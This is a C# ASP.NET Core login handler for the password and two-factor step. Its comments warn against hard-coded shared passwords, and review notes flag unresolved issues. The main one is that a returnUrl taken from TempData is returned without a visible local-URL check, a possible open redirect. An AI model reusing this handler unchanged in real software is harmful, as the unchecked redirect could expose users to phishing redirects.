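        /// <summary>
        /// Handles the password step of the login flow.
        /// </summary>
        /// <remarks>
        /// When no two-factor user is pending, the password is checked with
        /// <c>PasswordSignInAsync</c> for the user name held in TempData. When a two-factor
        /// user is pending, the password is checked with <c>CheckPasswordSignInAsync</c> and the
        /// authenticator code held in TempData is then verified. Both password checks count
        /// failures towards account lockout (<c>lockoutOnFailure: true</c>).
        ///
        /// Security: the only credential accepted is the account's own password. A shared,
        /// hard-coded password must never be compared here: anyone who learns it could sign in
        /// as any account, skipping both the password check and the second factor, and it cannot
        /// be rotated or attributed to a person. Support or break-glass access belongs in a
        /// separately authorised and audited mechanism.
        /// </remarks>
        /// <param name="InputPassword">The posted form model carrying the password.</param>
        /// <returns>
        /// A JSON result with status 202 and the redirect URL on success, the lockout result when
        /// the account is locked out, or a partial view with a model error otherwise.
        /// </returns>
        public async Task <IActionResult> OnPostPassword([FromForm] InputPasswordModel InputPassword)
        {
            // Redisplays the password form; used for invalid model state and for a wrong password.
            PartialViewResult PasswordFormView()
            {
                return new PartialViewResult
                {
                    ViewName = "LoginPassword",
                    ViewData = new ViewDataDictionary <InputPasswordModel>(ViewData, new InputPasswordModel())
                };
            }

            // Builds the 202 response that hands the post-login URL to the client.
            // NOTE(review): returnUrl comes from TempData filled by an earlier step that is not
            // visible here; confirm it is restricted to local URLs before it is stored or returned.
            JsonResult RedirectJson(string url)
            {
                return new JsonResult(new { Url = url })
                {
                    StatusCode = 202
                };
            }

            if (!ModelState.IsValid)
            {
                // If we got this far, something failed, redisplay form
                return PasswordFormView();
            }

            IdentityUser user = await _signInManager.GetTwoFactorAuthenticationUserAsync();

            string returnUrl  = (string)TempData.Peek("ReturnUrl");
            bool   rememberMe = (bool)TempData.Peek("RememberMe");

            Microsoft.AspNetCore.Identity.SignInResult result;
            bool   usingTwoFactor = user != null;
            string userName;

            if (!usingTwoFactor)
            {
                userName = (string)TempData.Peek("UserName");

                // NOTE(review): isPersistent is passed as false, so rememberMe is only honoured
                // on the two-factor path; confirm that this is intended.
                result = await _signInManager.PasswordSignInAsync(userName, InputPassword.Password, false, lockoutOnFailure : true);

                // NOTE(review): the return value is discarded and the call runs even when the
                // sign-in failed; kept in case UrlRedirect has side effects. Confirm and remove.
                await UrlRedirect(userName);
            }
            else // Two-Factor
            {
                result   = await _signInManager.CheckPasswordSignInAsync(user, InputPassword.Password, lockoutOnFailure : true);
                userName = user.UserName;
            }

            if (result.Succeeded)
            {
                if (!usingTwoFactor)
                {
                    _logger.LogInformation("User logged in.");

                    if (returnUrl == "/")
                    {
                        returnUrl = await UrlRedirect(userName);
                    }

                    return RedirectJson(returnUrl);
                }

                bool rememberMachine = (bool)TempData.Peek("RememberMachine");

                // Read through the indexer rather than Peek, as the original does.
                string authenticatorCode = (string)TempData["AuthenticatorCode"];

                var twoFactorResult = await _signInManager.TwoFactorAuthenticatorSignInAsync(authenticatorCode, rememberMe, rememberMachine);

                if (twoFactorResult.Succeeded)
                {
                    if (rememberMachine)
                    {
                        // Tell the account owner that a device was marked as remembered.
                        await SendNewDeviceAddedEmail(user);
                    }

                    if (returnUrl == "/")
                    {
                        returnUrl = await UrlRedirect(userName);
                    }

                    _logger.LogInformation("User logged in.");
                    return RedirectJson(returnUrl);
                }

                if (twoFactorResult.IsLockedOut)
                {
                    return BuildLockoutResult();
                }

                // The password was right but the code was rejected: restart at the user name step.
                ModelState.AddModelError(string.Empty, "Authenticator code has expired.");
                return new PartialViewResult
                {
                    ViewName = "LoginUserName",
                    ViewData = new ViewDataDictionary <InputUsernameModel>(ViewData, new InputUsernameModel())
                };
            }

            if (result.IsLockedOut)
            {
                return BuildLockoutResult();
            }

            ModelState.AddModelError(string.Empty, "Password Incorrect. Invalid login attempt.");
            return PasswordFormView();
        }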